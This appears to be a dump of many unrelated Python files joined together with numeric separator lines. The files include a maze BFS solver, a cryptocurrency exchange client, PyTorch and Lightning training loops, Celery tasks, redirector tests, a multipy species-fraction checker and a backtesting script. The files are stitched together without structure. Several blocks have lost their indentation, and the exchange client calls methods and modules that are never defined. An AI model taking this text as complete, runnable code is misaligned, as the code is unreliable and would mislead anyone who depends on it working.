    'O' stone piles, 'M' mechanisms, '#' walls, '.' open floor.
    """

    def bfs(self, maze, i, j, fx, fy, m, n):
        """Breadth-first search from cell (i, j).

        Returns the full m x n cost matrix of shortest distances from the
        start cell; unreachable cells hold ``math.inf``.

        BUG FIX: the original returned the int ``0`` when the start equalled
        the goal but a matrix otherwise, so callers indexing the result with
        ``[x][y]`` would crash on that branch.  The cost matrix (whose start
        entry is already 0) is now returned unconditionally.

        ``fx``/``fy`` are kept for signature compatibility; the search always
        explores the whole reachable region.
        """
        from collections import deque  # O(1) popleft instead of list.pop(0)
        cost = [[math.inf] * n for _ in range(m)]
        cost[i][j] = 0
        queue = deque([(i, j)])
        while queue:
            ci, cj = queue.popleft()
            for ni, nj in ((ci + 1, cj), (ci - 1, cj), (ci, cj + 1), (ci, cj - 1)):
                if 0 <= ni < m and 0 <= nj < n and maze[ni][nj] != '#' \
                        and cost[ni][nj] == math.inf:
                    cost[ni][nj] = cost[ci][cj] + 1
                    queue.append((ni, nj))
        return cost

    def minStep(self, maze, sx, sy, fx, fy, m, n):
        """Return the BFS cost matrix computed from (sx, sy)."""
        return self.bfs(maze, sx, sy, fx, fy, m, n)

    def minimalSteps(self, maze):
        """Return the minimal number of steps to reach 'T', or -1 if impossible.

        With mechanisms present, the strategy tried is: walk S->O for some
        stone pile O, visit every mechanism with O->M round trips (saving the
        return leg of the final mechanism), then finish M->T.
        """
        m, n = len(maze), len(maze[0])
        s_pos = t_pos = None
        m_list, o_list = [], []
        for i in range(m):
            for j in range(n):
                ch = maze[i][j]
                if ch == 'S':
                    s_pos = (i, j)
                elif ch == 'T':
                    t_pos = (i, j)
                elif ch == 'M':
                    m_list.append((i, j))
                elif ch == 'O':
                    o_list.append((i, j))
        # Without both a start and a target there is nothing to solve.
        if s_pos is None or t_pos is None:
            return -1
        sx, sy = s_pos
        tx, ty = t_pos
        s_cost = self.minStep(maze, sx, sy, tx, ty, m, n)
        if not m_list:
            dis = s_cost[tx][ty]
            return -1 if dis == math.inf else dis
        # One BFS per mechanism gives both O->M and M->T distances
        # (grid BFS distances are symmetric), instead of re-running a BFS
        # for every (O, M) pair as the original did.
        m_costs = [self.minStep(maze, mx, my, tx, ty, m, n) for mx, my in m_list]
        best = math.inf
        for ox, oy in o_list:
            s_to_o = s_cost[ox][oy]
            if s_to_o == math.inf:
                continue
            o_to_m = [mc[ox][oy] for mc in m_costs]
            m_to_t = [mc[tx][ty] for mc in m_costs]
            round_trips = sum(o_to_m) * 2
            # Choose which mechanism to visit last (its return leg is skipped).
            for k in range(len(m_list)):
                best = min(best, s_to_o + round_trips - o_to_m[k] + m_to_t[k])
        return -1 if best == math.inf else best
if __name__ == "__main__":
solution = Solution()
print(solution.minimalSteps(["S#O", "M..", "M.T"]))
print(solution.minimalSteps(["S#O", "M.#", "M.T"]))
print(solution.minimalSteps(["S#O", "M.T", "M.."]))
| 4,444 | 1,673 |
import requests
import json
from datetime import date, datetime, timedelta
class Coinext:
    """Thin REST client for the Coinext exchange API.

    NOTE(review): several methods call ``self.executarRequestBrasilBTC`` and
    ``Util``, neither of which is defined or imported in this module —
    presumably copied from a BrasilBTC client; confirm before using those
    endpoints.
    """

    def __init__(self, ativo):
        # `ativo` is the asset/ticker symbol (e.g. 'BTC') used to build pairs.
        self.ativo = ativo
        self.urlCoinext = 'https://api.coinext.com.br:8443/AP/'

    def service_url(self, service_name):
        """Return the full URL for an API service name.

        BUG FIX: the original definition was missing ``self``, so every
        ``self.service_url(...)`` call raised a TypeError.
        """
        return 'https://api.coinext.com.br:8443/AP/%s' % service_name

    def call_get(self, service_name):
        """GET a service endpoint and decode the JSON response."""
        res = requests.get(self.service_url(service_name))
        return json.loads(res.content)

    def call_post(self, service_name, payload):
        """POST a JSON-serialized payload to a service endpoint and decode the response."""
        res = requests.post(self.service_url(service_name), data=json.dumps(payload))
        return json.loads(res.content)

    def obterBooks(self):
        """Fetch a depth-1 level-2 order-book snapshot."""
        payload = {
            'OMSId': 1,
            'AccountId': 1,
            'InstrumentId': 1,
            'Depth': 1
        }
        return self.call_post('GetL2Snapshot', payload)
        #return self.executarRequestCoinext('GET', payload, 'GetL2Snapshot')

    def obterSaldo(self):
        """Fetch the account balance."""
        return self.executarRequestBrasilBTC('GET', '', '/api/get_balance')

    def obterOrdemPorId(self, idOrdem):
        """Fetch a single order by its id."""
        return self.executarRequestBrasilBTC('GET', '', 'api/check_order/{}'.format(idOrdem))

    def enviarOrdemCompra(self, quantity, tipoOrdem, precoCompra):
        """Place a buy order for the configured asset against BRL."""
        payload = {
            'coin_pair': 'BRL{}'.format(self.ativo),
            'order_type': tipoOrdem,
            'type': 'buy',
            'amount': quantity,
            'price': precoCompra
        }
        # Without serializing the payload (json.dumps) the API returns a
        # "currency not found" error.
        retorno = self.executarRequestBrasilBTC('POST', json.dumps(payload), 'api/create_order')
        return retorno

    def enviarOrdemVenda(self, quantity, tipoOrdem, precoVenda):
        """Place a sell order for the configured asset against BRL."""
        payload = {
            'coin_pair': 'BRL{}'.format(self.ativo),
            'order_type': tipoOrdem,
            'type': 'sell',
            'amount': quantity,
            'price': precoVenda
        }
        # Without serializing the payload (json.dumps) the API returns a
        # "currency not found" error.
        retorno = self.executarRequestBrasilBTC('POST', json.dumps(payload), 'api/create_order')
        return retorno

    def TransferirCrypto(self, quantity):
        """Withdraw `quantity` of the asset to the configured external address."""
        config = Util.obterCredenciais()  # NOTE(review): `Util` is not imported here
        payload = {
            'coin': self.ativo,
            'amount': quantity,
            'address': config["MercadoBitcoin"]["Address"],
            'priority': 'medium'
        }
        # Without serializing the payload (json.dumps) the API returns a
        # "currency not found" error.
        return self.executarRequestBrasilBTC('POST', json.dumps(payload), '/api/send')

    def cancelarOrdem(self, idOrdem):
        """Cancel an open order by its id."""
        return self.executarRequestBrasilBTC('GET', '', 'api/remove_order/{}'.format(idOrdem))

    def obterOrdensAbertas(self):
        """List the account's open orders."""
        return self.executarRequestBrasilBTC('GET', '', '/api/my_orders')

    def obterDadosUsuario(self):
        """Fetch the authenticated user's profile data."""
        return self.executarRequestCoinext('POST', '', 'GetUserInfo')

    def obterToken(self):
        """Authenticate with HTTP basic auth and return the session token.

        Returns None implicitly when authentication fails.
        """
        config = Util.obterCredenciais()  # NOTE(review): `Util` is not imported here
        res = requests.get(self.urlCoinext + 'authenticate', auth=(config['Coinext']['Login'], config['Coinext']['Password']))
        auth = json.loads(res.text.encode('utf8'))
        if auth['Authenticated']:
            return auth['Token']

    def executarRequestCoinext(self, requestMethod, payload, endpoint):
        """Perform an authenticated request against the Coinext API."""
        headers = {
            'aptoken': self.obterToken(),
            'Content-type': 'application/json'
        }
        # basic request via the `requests` module
        res = requests.request(requestMethod, self.urlCoinext + endpoint, headers=headers, data=payload)
        return json.loads(res.text.encode('utf8'))
from raspi_io import SoftSPI, GPIO
import raspi_io.utility as utility
if __name__ == "__main__":
    # Locate the first raspi_io server on the LAN (50 ms scan timeout).
    address = utility.scan_server(0.05)[0]
    # Two soft-SPI buses sharing clk/mosi/miso, distinguished by chip-select.
    cpld = SoftSPI(address, GPIO.BCM, cs=7, clk=11, mosi=10, miso=9, bits_per_word=10)
    flash = SoftSPI(address, GPIO.BCM, cs=8, clk=11, mosi=10, miso=9, bits_per_word=8)
    # Command sequence sent to the CPLD, one word at a time.
    for command in (0x0, 0x10, 0x30, 0x80):
        cpld.write([command])
    # 0x9f = JEDEC "read identification"; read 3 response bytes and dump them.
    data = flash.xfer([0x9f], 3)
    flash.print_binary(data)
| 469 | 227 |
class Solution:
    def checkValidString(self, s):
        """
        :type s: str
        :rtype: bool

        Track the range [lo, hi] of possible open-parenthesis counts while
        treating '*' as '(' for the upper bound and ')' for the lower bound.
        The string is valid iff the range never becomes entirely negative
        and zero is still reachable at the end.
        """
        lo = hi = 0
        for ch in s:
            if ch == '(':
                lo += 1
                hi += 1
            elif ch == ')':
                lo -= 1
                hi -= 1
            else:  # '*' may act as '(', ')' or nothing
                lo -= 1
                hi += 1
            if hi < 0:
                return False
            lo = max(lo, 0)  # the count can never actually go below zero
        return lo == 0
from torch import nn, optim
from torch.utils.tensorboard import SummaryWriter
from tqdm import tqdm
import torch
def get_optimizer(model, lr):
    """Build an Adam optimizer over all of *model*'s parameters with learning rate *lr*."""
    parameters = model.parameters()
    return optim.Adam(parameters, lr=lr)
def _to_one_hot(y, num_classes):
scatter_dim = len(y.size())
y_tensor = y.view(*y.size(), -1)
zeros = torch.zeros(*y.size(), num_classes, dtype=y.dtype)
return zeros.scatter(scatter_dim, y_tensor, 1).permute(0, 3, 2, 1)
def one_hot_to_int(y):
    """Collapse a channel-first one-hot tensor back to integer labels via argmax.

    Input (batch, C, H, W) -> output (batch, H, W).
    """
    channels_last = y.permute(0, 2, 3, 1)
    return channels_last.argmax(dim=-1)
def train(model, input_channel, loader, callback, epoch_num, device, lr, run_num):
    """Train a next-frame prediction model on one-hot encoded video frames.

    Args:
        model: network that maps a one-hot frame to a list of
            (prediction, cell_state) tuples; the last entry is used.
        input_channel: number of classes used for one-hot encoding.
        loader: iterable of (frames, video_inds, frame_inds) batches where
            frames has shape (batch, time, H, W).
        callback: invoked once per epoch with (sample, video_inds[i], epoch)
            to dump sample predictions.
        epoch_num: total number of epochs.
        device: torch device for the model and tensors.
        lr: initial Adam learning rate.
        run_num: suffix used in the log and checkpoint paths.
    """
    image_samples = 10
    writer_path = 'vqvae_videomnist_1_00099_lstm'
    optimizer = get_optimizer(model, lr)
    model = model.to(device)
    model = nn.DataParallel(model)
    criterion = nn.MSELoss()
    writer = SummaryWriter(log_dir='logs/{}_{}'.format(*[writer_path, run_num]))
    for epoch in range(epoch_num):
        loader = tqdm(loader)
        mse_sum = 0
        mse_n = 0
        for batch_idx, (frames, video_inds, frame_inds) in enumerate(loader):
            model.zero_grad()
            # Predict frame i+1 from frame i for every adjacent pair in the clip.
            for i in range(frames.shape[1] - 1):
                input_ = _to_one_hot(frames[:, i, :, :], input_channel).float()
                output = _to_one_hot(frames[:, i + 1, :, :], input_channel).float()
                input_ = input_.to(device)
                output = output.to(device)
                cell_states = model(input_)
                pred, cell_state = cell_states[-1]
                loss = criterion(pred, output)
                loss.backward()
                optimizer.step()
                mse_sum += loss.item() * input_.shape[0]
                mse_n += input_.shape[0]
                lr = optimizer.param_groups[0]['lr']
                # BUG FIX: was `iter % 200 is 0` -- identity comparison of ints
                # is unreliable (and `iter` shadowed the builtin); also the
                # first format string was missing its `f` prefix, so the
                # braces were printed literally instead of being interpolated.
                if batch_idx % 200 == 0:
                    loader.set_description(
                        (
                            f'iter: {batch_idx + 1}; mse: {loss.item():.5f}; '
                            f'avg mse: {mse_sum / mse_n:.5f}; '
                            f'lr: {lr:.5f}'
                        )
                    )
            if batch_idx == 0 and epoch > 0:
                # BUG FIX: the scalar was logged at the constant step
                # `epoch_num`, overwriting the same point every epoch.
                writer.add_scalar('Loss/train', mse_sum / mse_n, epoch)
                sample = pred[:image_samples, :, :, :]
                sample = one_hot_to_int(sample)
                # NOTE(review): `i` here is the leftover index of the *last*
                # frame pair -- confirm video_inds[i] is really intended.
                callback(sample, video_inds[i], epoch)
        torch.save(model.state_dict(),
                   '../video/checkpoints/videomnist/vqvae-lstm/{}/{}.pt'.format(*[run_num, str(epoch).zfill(5)]))
| 2,527 | 890 |
"""
Zip - Unindo iteráveis
Zip_longest _ Itertools
"""
from itertools import zip_longest, count
# Demonstration: pair each city with a state. zip_longest pads the shorter
# iterable (estados) with None instead of truncating like zip() would.
index = count()  # kept for parity with the original example (unused)
cidades = ['Sao Paulo', 'Belo Horizonte', 'Salvador', 'Monte Belo']
estados = ['SP', 'MG', 'BA']
cidades_estados = zip_longest(cidades, estados)
for par in cidades_estados:
    print(par)
import os
import ast
import torch
import torch.nn as nn
from torch.nn import functional as F
import torch.optim as optim
from torch.utils.data import DataLoader
from pytorch_lightning.core.lightning import LightningModule
from pytorch_lightning import Trainer
from argparse import ArgumentParser
from model import SpeechRecognition
from dataset import Data, collate_fn_padd
from pytorch_lightning.loggers import TensorBoardLogger
from pytorch_lightning.callbacks import ModelCheckpoint
class SpeechModule(LightningModule):
    """Lightning wrapper that trains a SpeechRecognition network with CTC loss."""

    def __init__(self, model, args):
        super(SpeechModule, self).__init__()
        self.model = model
        # blank=28 is the CTC blank index; zero_infinity guards against
        # degenerate alignments producing inf losses.
        self.criterion = nn.CTCLoss(blank=28, zero_infinity=True)
        self.args = args

    def forward(self, x, hidden):
        """Delegate straight to the wrapped model."""
        return self.model(x, hidden)

    def configure_optimizers(self):
        """AdamW optimizer plus a reduce-on-plateau LR scheduler."""
        self.optimizer = optim.AdamW(self.model.parameters(), self.args.learning_rate)
        self.scheduler = optim.lr_scheduler.ReduceLROnPlateau(
            self.optimizer, mode='min',
            factor=0.50, patience=6)
        return [self.optimizer], [self.scheduler]

    def step(self, batch):
        """Run one forward pass over a padded batch and return the CTC loss."""
        spectrograms, labels, input_lengths, label_lengths = batch
        batch_size = spectrograms.shape[0]
        hidden = self.model._init_hidden(batch_size)
        h0, c0 = hidden[0].to(self.device), hidden[1].to(self.device)
        raw_output, _ = self(spectrograms, (h0, c0))
        log_probs = F.log_softmax(raw_output, dim=2)
        return self.criterion(log_probs, labels, input_lengths, label_lengths)

    def training_step(self, batch, batch_idx):
        loss = self.step(batch)
        logs = {'loss': loss, 'lr': self.optimizer.param_groups[0]['lr']}
        return {'loss': loss, 'log': logs}

    def train_dataloader(self):
        # NOTE(review): `Data.parameters` is a class-level dict and update()
        # mutates it in place for every later user -- confirm this is intended.
        params = Data.parameters
        params.update(self.args.dparams_override)
        train_dataset = Data(json_path=self.args.train_file, **params)
        return DataLoader(dataset=train_dataset,
                          batch_size=self.args.batch_size,
                          num_workers=self.args.data_workers,
                          pin_memory=True,
                          collate_fn=collate_fn_padd)

    def validation_step(self, batch, batch_idx):
        return {'val_loss': self.step(batch)}

    def validation_epoch_end(self, outputs):
        """Average the validation loss and drive the plateau scheduler with it."""
        avg_loss = torch.stack([out['val_loss'] for out in outputs]).mean()
        self.scheduler.step(avg_loss)
        tensorboard_logs = {'val_loss': avg_loss}
        return {'val_loss': avg_loss, 'log': tensorboard_logs}

    def val_dataloader(self):
        params = Data.parameters
        params.update(self.args.dparams_override)
        test_dataset = Data(json_path=self.args.valid_file, **params, valid=True)
        return DataLoader(dataset=test_dataset,
                          batch_size=self.args.batch_size,
                          num_workers=self.args.data_workers,
                          collate_fn=collate_fn_padd,
                          pin_memory=True)
def checkpoint_callback(args):
    """Build the ModelCheckpoint callback that keeps the best (lowest val_loss) weights."""
    return ModelCheckpoint(
        monitor='val_loss',
        mode='min',
        filepath=args.save_model_path,
        save_top_k=True,
        verbose=True,
        prefix=''
    )
def main(args):
    """Build the model/module from the parsed CLI args and launch training."""
    h_params = SpeechRecognition.hyper_parameters
    h_params.update(args.hparams_override)
    model = SpeechRecognition(**h_params)
    # Resume from a pretrained checkpoint when one is supplied.
    if args.load_model_from:
        speech_module = SpeechModule.load_from_checkpoint(args.load_model_from, model=model, args=args)
    else:
        speech_module = SpeechModule(model, args)
    logger = TensorBoardLogger(args.logdir, name='speech_recognition')
    # BUG FIX: the original built a throwaway `Trainer(logger=logger)` here
    # and immediately overwrote it; only the fully-configured Trainer is kept.
    trainer = Trainer(
        max_epochs=args.epochs, gpus=args.gpus,
        num_nodes=args.nodes, distributed_backend=None,
        logger=logger, gradient_clip_val=1.0,
        val_check_interval=args.valid_every,
        checkpoint_callback=checkpoint_callback(args),
        resume_from_checkpoint=args.resume_from_checkpoint
    )
    trainer.fit(speech_module)
if __name__ == "__main__":
parser = ArgumentParser()
# distributed training setup
parser.add_argument('-n', '--nodes', default=1, type=int, help='number of data loading workers')
parser.add_argument('-g', '--gpus', default=1, type=int, help='number of gpus per node')
parser.add_argument('-w', '--data_workers', default=0, type=int,
help='n data loading workers, default 0 = main process only')
parser.add_argument('-db', '--dist_backend', default='ddp', type=str,
help='which distributed backend to use. defaul ddp')
# train and valid
parser.add_argument('--train_file', default=None, required=True, type=str,
help='json file to load training data')
parser.add_argument('--valid_file', default=None, required=True, type=str,
help='json file to load testing data')
parser.add_argument('--valid_every', default=1000, required=False, type=int,
help='valid after every N iteration')
# dir and path for models and logs
parser.add_argument('--save_model_path', default=None, required=True, type=str,
help='path to save model')
parser.add_argument('--load_model_from', default=None, required=False, type=str,
help='path to load a pretrain model to continue training')
parser.add_argument('--resume_from_checkpoint', default=None, required=False, type=str,
help='check path to resume from')
parser.add_argument('--logdir', default='tb_logs', required=False, type=str,
help='path to save logs')
# general
parser.add_argument('--epochs', default=10, type=int, help='number of total epochs to run')
parser.add_argument('--batch_size', default=64, type=int, help='size of batch')
parser.add_argument('--learning_rate', default=1e-3, type=float, help='learning rate')
parser.add_argument('--pct_start', default=0.3, type=float, help='percentage of growth phase in one cycle')
parser.add_argument('--div_factor', default=100, type=int, help='div factor for one cycle')
parser.add_argument("--hparams_override", default="{}", type=str, required=False,
help='override the hyper parameters, should be in form of dict. ie. {"attention_layers": 16 }')
parser.add_argument("--dparams_override", default="{}", type=str, required=False,
help='override the data parameters, should be in form of dict. ie. {"sample_rate": 8000 }')
args = parser.parse_args()
args.hparams_override = ast.literal_eval(args.hparams_override)
args.dparams_override = ast.literal_eval(args.dparams_override)
if args.save_model_path:
if not os.path.isdir(os.path.dirname(args.save_model_path)):
raise Exception("the directory for path {} does not exist".format(args.save_model_path))
main(args) | 7,087 | 2,165 |
"""
AWS DeepRacer reward function using only progress
"""
#===============================================================================
#
# REWARD
#
#===============================================================================
def reward_function(params):
    """AWS DeepRacer reward based purely on track progress.

    The reward grows linearly with progress: 1.0 at 0% progress up to
    101.0 at 100% (baseline 102 minus a fixed motivator of 1 minus the
    remaining distance to the goal).
    """
    baseline = 102
    motivator = -1
    distance_to_goal = 100.0 - params['progress']
    reward = baseline + motivator - distance_to_goal
    # 1e-8 is a crash so we ALWAYS need to be higher than that
    return float(max(reward, 1e-3))
| 596 | 164 |
from __future__ import absolute_import, unicode_literals
from hashlib import sha1
from time import sleep
from celery import shared_task
from .models import JPEGFile
@shared_task
def calculate_etag(pk):
    """Compute and persist the SHA-1 etag of a stored JPEG file.

    The 5 s sleep artificially delays the save so the task is observably
    asynchronous.
    """
    jpeg = JPEGFile.objects.get(pk=pk)
    content = jpeg.file.read()
    jpeg.etag = sha1(content).hexdigest()
    sleep(5)
    jpeg.save()
@shared_task(bind=True)
def forced_failure(self):
    """Task that always raises, to exercise failure/error-handling paths."""
    raise Exception('forced failure')
@shared_task(bind=True, max_retries=None)
def retry_forever(self):
    """Task that retries itself every 5 s forever (max_retries=None removes the cap)."""
    self.retry(countdown=5)
@shared_task(bind=True)
def sleep_for_success(self):
    """Task that sleeps 5 s and then completes successfully."""
    sleep(5)
| 579 | 218 |
# coding=utf-8
"""
Redirector tests
"""
from redirector import views
def test_redirects_correctly(client):
    """A request is permanently redirected to the same path+query on the target host."""
    resp = client.get('/foo/bar.html?foo=bar')
    assert resp.status_code == 301
    assert resp.headers['Location'] == 'https://www.example.com/foo/bar.html?foo=bar'
def test_normalize_port_normalizes_properly():
    """Default scheme ports collapse to None; anything else is coerced to int."""
    # `is None` is the idiomatic identity check (the original used `== None`,
    # flagged by flake8 E711).
    assert views.normalize_port('http', 80) is None
    assert views.normalize_port('https', 443) is None
    assert views.normalize_port('http', 8080) == 8080
    assert views.normalize_port('http', '8080') == 8080
def test_make_base_url_with_root_base_path():
    """A '/' base path yields scheme://host:port/."""
    result = views.make_base_url('https', 'foo.bar', 80, '/')
    assert result == 'https://foo.bar:80/'
def test_make_base_url_with_non_root_base_path():
    """A non-root base path is appended verbatim to scheme://host:port."""
    result = views.make_base_url('https', 'foo.bar', 80, '/fooooooooo/')
    assert result == 'https://foo.bar:80/fooooooooo/'
def test_make_redirect_url_with_root():
    """An empty request path resolves to the base URL itself."""
    expected = 'https://foo.bar:80/aye/aye/captain/'
    result = views.make_redirect_url('', 'https', 'foo.bar', 80, '/aye/aye/captain/')
    assert result == expected
def test_make_redirect_url_with_root_base_path():
    """With a '/' base path, the request path (incl. query string) is kept as-is."""
    path = 'aye/aye/captain?jump_overboard=true&depth=199'
    expected = 'https://foo.bar:80/aye/aye/captain?jump_overboard=true&depth=199'
    result = views.make_redirect_url(path, 'https', 'foo.bar', 80, '/')
    assert result == expected
def test_make_redirect_url_with_non_root_base_path():
    """A non-root base path is prefixed before the request path."""
    path = 'aye/aye/captain?jump_overboard=true&depth=199'
    expected = 'https://foo.bar:80/fooooooooo/aye/aye/captain?jump_overboard=true&depth=199'
    result = views.make_redirect_url(path, 'https', 'foo.bar', 80, '/fooooooooo/')
    assert result == expected
| 2,028 | 782 |
"""multipy: Python library for multicomponent mass transfer"""
__author__ = "James C. Sutherland, Kamila Zdybal"
__copyright__ = "Copyright (c) 2022, James C. Sutherland, Kamila Zdybal"
__license__ = "MIT"
__version__ = "1.0.0"
__maintainer__ = ["Kamila Zdybal"]
__email__ = ["kamilazdybal@gmail.com"]
__status__ = "Production"
import numpy as np
import pandas as pd
import random
import copy
import scipy
import multipy
import warnings
gas_constant = 8.31446261815324
################################################################################
################################################################################
####
#### Class: Check
####
################################################################################
################################################################################
class Check:
    """
    Supports performing basic checks of the computed quantities.
    """
    # --------------------------------------------------------------------------
    def __init__(self):
        pass
    # --------------------------------------------------------------------------
    def _validate_species_matrix(self, matrix, name, tolerance, verbose):
        """Validate a ``(n_species, n_observations)`` matrix together with the
        ``tolerance``/``verbose`` arguments shared by all public checks.

        BUG FIX: the original methods repeated this validation with mutually
        inconsistent messages (some referencing parameter names that do not
        exist, e.g. ``species_mole_fractions``) and ``range_of_species_fractions``
        skipped the tolerance validation entirely.

        :return: tuple ``(n_species, n_observations)``.
        """
        if not isinstance(matrix, np.ndarray):
            raise ValueError("Parameter `%s` has to be of type `numpy.ndarray`." % name)
        try:
            (n_species, n_observations) = np.shape(matrix)
        except ValueError:
            raise ValueError("Parameter `%s` has to be a matrix." % name)
        if n_species < 2:
            raise ValueError("Parameter `%s` has to have at least two species." % name)
        if n_observations < n_species:
            # Most likely the matrix was passed transposed.
            warnings.warn("Number of observations in `%s` is smaller than the number of species. Make sure that `%s` has shape `(n_species, n_observations)`." % (name, name))
        if not isinstance(tolerance, float):
            raise ValueError("Parameter `tolerance` has to be of type `float`.")
        if tolerance <= 0 or tolerance >= 1:
            raise ValueError("Parameter `tolerance` has to be larger than 0 and smaller than 1.")
        if not isinstance(verbose, bool):
            raise ValueError("Parameter `verbose` has to be of type `bool`.")
        return (n_species, n_observations)
    # --------------------------------------------------------------------------
    def _column_sum_outliers(self, matrix, target, tolerance):
        """Return indices of observations (columns) whose column sum is NOT
        strictly within ``(target - tolerance, target + tolerance)``.

        Vectorized replacement for the original per-observation Python loop.
        """
        sums = np.sum(matrix, axis=0)
        within = (sums < target + tolerance) & (sums > target - tolerance)
        if within.all():
            return np.array([])
        (idx, ) = np.where(~within)
        return idx
    # --------------------------------------------------------------------------
    def sum_of_species_fractions(self, species_fractions, tolerance=1e-12, verbose=False):
        """
        Checks if all species mole/mass/volume fractions sum to 1.0 for
        every observation within a specified tolerance:

        .. math::

            \\sum_{i=1}^{n} X_i = 1.0

        (and analogously for mass fractions :math:`Y_i` and volume fractions
        :math:`V_i`), where :math:`n` is the number of species.

        :param species_fractions:
            scalar ``numpy.ndarray`` specifying **all** species mole/mass/volume fractions in :math:`[-]`.
            It should be of size ``(n_species, n_observations)`` where
            ``n_species`` is at least 2.
        :param tolerance: (optional)
            ``float`` specifying the tolerance. It should be larger than 0.0 and
            smaller than 1.0.
        :param verbose: (optional)
            ``bool`` for printing verbose information.

        :return:
            - **idx** - indices of observations where species mole/mass/volume fractions do not sum to 1.0 within a specified tolerance.
        """
        self._validate_species_matrix(species_fractions, 'species_fractions', tolerance, verbose)
        idx = self._column_sum_outliers(species_fractions, 1.0, tolerance)
        if verbose:
            if len(idx) == 0:
                print('All mole/mass/volume fractions sum to 1.0 within a specified tolerance.')
            else:
                print('Detected observations where mole/mass/volume fractions do not sum to 1.0 within a specified tolerance.')
        return idx
    # --------------------------------------------------------------------------
    def range_of_species_fractions(self, species_fractions, tolerance=1e-12, verbose=False):
        """
        Checks if all species mole/mass/volume fraction values are bounded
        between 0 and 1:

        .. math::

            X_i \\in \\langle 0, 1 \\rangle

        (and analogously for mass fractions :math:`Y_i` and volume fractions
        :math:`V_i`).

        :param species_fractions:
            scalar ``numpy.ndarray`` specifying **all** species mole/mass/volume fractions in :math:`[-]`.
            It should be of size ``(n_species, n_observations)`` where
            ``n_species`` is at least 2.
            (BUG FIX: the original docstring claimed ``(n_observations, n_species)``,
            contradicting what the code unpacks.)
        :param tolerance: (optional)
            ``float`` specifying the tolerance. It should be larger than 0.0 and
            smaller than 1.0.
        :param verbose: (optional)
            ``bool`` for printing verbose information.

        :return:
            - **idx_below_zero** - (row, column) indices of entries less than 0.0 within a specified tolerance.
            - **idx_above_one** - (row, column) indices of entries larger than 1.0 within a specified tolerance.
        """
        self._validate_species_matrix(species_fractions, 'species_fractions', tolerance, verbose)
        below = species_fractions < (0 - tolerance)
        if below.any():
            if verbose: print('Not all mole/mass/volume fractions are larger than 0.0 within a specified tolerance.')
            (row_idx, col_idx) = np.where(below)
            idx_below_zero = np.hstack((row_idx[:,None], col_idx[:,None]))
        else:
            if verbose: print('All mole/mass/volume fractions are larger than 0.0 within a specified tolerance.')
            idx_below_zero = np.array([])
        above = species_fractions > (1 + tolerance)
        if above.any():
            if verbose: print('Not all mole/mass/volume fractions are smaller than 1.0 within a specified tolerance.')
            (row_idx, col_idx) = np.where(above)
            idx_above_one = np.hstack((row_idx[:,None], col_idx[:,None]))
        else:
            if verbose: print('All mole/mass/volume fractions are smaller than 1.0 within a specified tolerance.')
            idx_above_one = np.array([])
        return (idx_below_zero, idx_above_one)
    # --------------------------------------------------------------------------
    def sum_of_species_gradients(self, species_gradients, tolerance=1e-12, verbose=False):
        """
        Checks if all species mole/mass/volume fraction gradients sum to 0.0
        for every observation within a specified tolerance:

        .. math::

            \\sum_{i=1}^{n} \\nabla X_i = 0.0

        (and analogously for :math:`\\nabla Y_i` and :math:`\\nabla V_i`),
        where :math:`n` is the number of species.

        :param species_gradients:
            scalar ``numpy.ndarray`` specifying **all** species mole/mass/volume fraction gradients in :math:`[-]`.
            It should be of size ``(n_species, n_observations)`` where
            ``n_species`` is at least 2.
        :param tolerance: (optional)
            ``float`` specifying the tolerance. It should be larger than 0.0 and
            smaller than 1.0.
        :param verbose: (optional)
            ``bool`` for printing verbose information.

        :return:
            - **idx** - indices of observations where species mole/mass/volume fraction gradients do not sum to 0.0 within a specified tolerance.
        """
        self._validate_species_matrix(species_gradients, 'species_gradients', tolerance, verbose)
        idx = self._column_sum_outliers(species_gradients, 0.0, tolerance)
        if verbose:
            if len(idx) == 0:
                print('All mole/mass/volume fraction gradients sum to 0.0 within a specified tolerance.')
            else:
                print('Detected observations where mole/mass/volume fraction gradients do not sum to 0.0 within a specified tolerance.')
        return idx
    # --------------------------------------------------------------------------
    def sum_of_species_production_rates(self, species_production_rates, tolerance=1e-12, verbose=False):
        """
        Checks if all species production rates sum to 0.0 for every
        observation within a specified tolerance:

        .. math::

            \\sum_{i=1}^{n} s_i = 0.0

        (and analogously for net mass production rates :math:`\\omega_i`),
        where :math:`n` is the number of species.

        :param species_production_rates:
            scalar ``numpy.ndarray`` specifying **all** species production rates, :math:`s_i` in :math:`mole/(m^3s)` or :math:`\\omega_i` in :math:`kg/(m^3s)`.
            It should be of size ``(n_species, n_observations)`` where
            ``n_species`` is at least 2.
        :param tolerance: (optional)
            ``float`` specifying the tolerance. It should be larger than 0.0 and
            smaller than 1.0.
        :param verbose: (optional)
            ``bool`` for printing verbose information.

        :return:
            - **idx** - indices of observations where species source terms do not sum to 0.0 within a specified tolerance.
        """
        self._validate_species_matrix(species_production_rates, 'species_production_rates', tolerance, verbose)
        idx = self._column_sum_outliers(species_production_rates, 0.0, tolerance)
        if verbose:
            if len(idx) == 0:
                print('All species production rates sum to 0.0 within a specified tolerance.')
            else:
                print('Detected observations where species production rates do not sum to 0.0 within a specified tolerance.')
        return idx
    # --------------------------------------------------------------------------
| 13,715 | 3,801 |
import numpy as np
import pandas as pd
from backtesting.analysis import plot_cost_proceeds, plot_holdings, \
plot_performance
from backtesting.report import Report
from backtesting.simulation import simulate
def main() -> None:
    """Exercise the simulator on synthetic random data and plot the holdings."""
    from string import ascii_uppercase

    np.random.seed(42)
    symbols = list(ascii_uppercase[:5])
    n_markets = len(symbols)
    n_seconds = 86400
    fee = 0.0001
    expiration = 10
    index = pd.date_range('2000-01-01', freq='S', periods=n_seconds)
    # Random dummy signal fractions (RNG call order matches the original
    # so the seeded data is identical).
    buy_fraction = pd.DataFrame(
        1 - np.random.rand(n_seconds, n_markets) ** (1 / 30),
        index=index, columns=symbols)
    sell_fraction = pd.DataFrame(
        1 - (1 - np.random.rand(n_seconds, n_markets)) ** (1 / 300),
        index=index, columns=symbols)
    price = pd.DataFrame(
        np.random.lognormal(1e-7, 1e-4, size=(n_seconds, n_markets)).cumprod(axis=0),
        index=index, columns=symbols)
    # Knock out roughly one seventh of the prices to simulate missing quotes.
    drop = np.random.permutation(np.arange(price.size).reshape(*price.shape))
    price[drop % 7 == 0] = np.nan
    report = simulate(100_000., buy_fraction, sell_fraction, price, fee,
                      expiration, expiration, single_trade=True)
    plot_holdings(report)
    import matplotlib.pyplot as plt
    plt.show()
if __name__ == '__main__':
    main()
# Public names re-exported by this module.
__all__ = ['simulate', 'plot_holdings', 'plot_cost_proceeds',
           'plot_performance']
| 1,311 | 491 |
'''
Author: Geeticka Chauhan
